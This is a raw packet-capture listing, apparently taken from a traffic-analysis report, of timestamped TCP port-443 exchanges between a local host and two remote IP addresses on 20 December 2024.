                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.413680077 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415491104 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415534973 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415637016 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415674925 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415689945 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415698051 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415801048 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415838957 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415854931 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.415870905 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418148041 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418195009 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418325901 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418353081 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418360949 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418370962 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418420076 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418441057 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418456078 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418474913 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418488026 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418689966 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418757915 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.418785095 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420157909 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420269012 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420448065 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420475006 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420488119 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420675039 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.420706034 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.421813011 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.421895981 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422039986 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422065020 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422075987 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422184944 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422219038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.422219038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423444986 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423511028 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423589945 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.423609972 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.425201893 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.430958986 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.430975914 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431000948 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431026936 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431041002 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431097984 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431118965 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431159973 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431174040 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431211948 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.431262016 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437472105 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437510967 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437557936 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437577963 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437674046 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437685966 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.437701941 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.475334883 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476346970 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476371050 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476392031 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476408958 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476423979 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476435900 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476444006 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476465940 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476483107 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476496935 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.476947069 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477093935 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477109909 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477197886 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477212906 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477255106 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477268934 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477282047 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477300882 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477336884 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477348089 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477410078 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477463961 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477509975 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477710962 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477767944 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477813005 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477829933 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477875948 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.477895975 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.523327112 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.538815975 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545340061 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545356035 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545547009 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545581102 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545618057 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545897007 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545919895 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545941114 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545953035 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.545989990 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.551136017 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.551173925 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.551975965 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552144051 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552158117 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552180052 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552194118 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552206039 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552468061 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552509069 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552541018 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552607059 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552624941 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552638054 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552649021 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552659988 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.552683115 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.556799889 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.556931973 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.556946039 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.556969881 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.556992054 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557034016 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557048082 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557065964 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557115078 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557126999 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557178020 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557185888 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557205915 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557223082 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557265997 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557286024 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.557329893 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596788883 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596925020 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596955061 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596976042 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596983910 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.596999884 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597011089 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597057104 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597070932 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597090006 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597101927 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597138882 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597157955 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597179890 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597189903 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597219944 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597265959 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597287893 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597326040 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597362995 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597371101 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597389936 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597421885 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597443104 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.597506046 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637218952 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637382030 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637412071 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637427092 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637458086 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637485027 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637497902 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637518883 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637531996 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637538910 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637547970 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637553930 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637576103 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637593985 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637607098 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637651920 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637660027 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637677908 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637692928 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637703896 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637715101 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637737989 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637748003 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637785912 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637799978 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637809038 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637819052 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637871981 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637890100 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637902975 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637916088 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637953997 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.637972116 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638010025 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638052940 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638061047 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.638077974 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675271988 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675457001 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675491095 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675508976 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675524950 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675554037 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675586939 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675601006 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675614119 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675622940 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675642014 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675653934 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675662994 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675697088 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675723076 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675735950 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675755024 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675765991 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675847054 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675858021 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675942898 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675955057 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675970078 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675988913 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.675998926 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676017046 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676048994 CET49918443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.676057100 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.717068911 CET44349918116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868359089 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868433952 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868855000 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.868869066 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.872036934 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:54.872045994 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655249119 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655287027 CET4434993420.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655441999 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655704021 CET49934443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.655719042 CET4434993420.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658211946 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658272028 CET4434993520.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658480883 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658952951 CET49935443192.168.2.720.42.65.90
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.658965111 CET4434993520.42.65.90192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750164032 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750237942 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750262022 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750283003 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750333071 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750339985 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750386000 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750425100 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750528097 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750866890 CET49924443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.750880957 CET44349924116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.753921032 CET49936443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.753969908 CET44349936116.203.12.114192.168.2.7
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.754324913 CET49936443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.754544020 CET49936443192.168.2.7116.203.12.114
                                                                                                                                                                                                                                                                              Dec 20, 2024 07:31:55.754559994 CET44349936116.203.12.114192.168.2.7
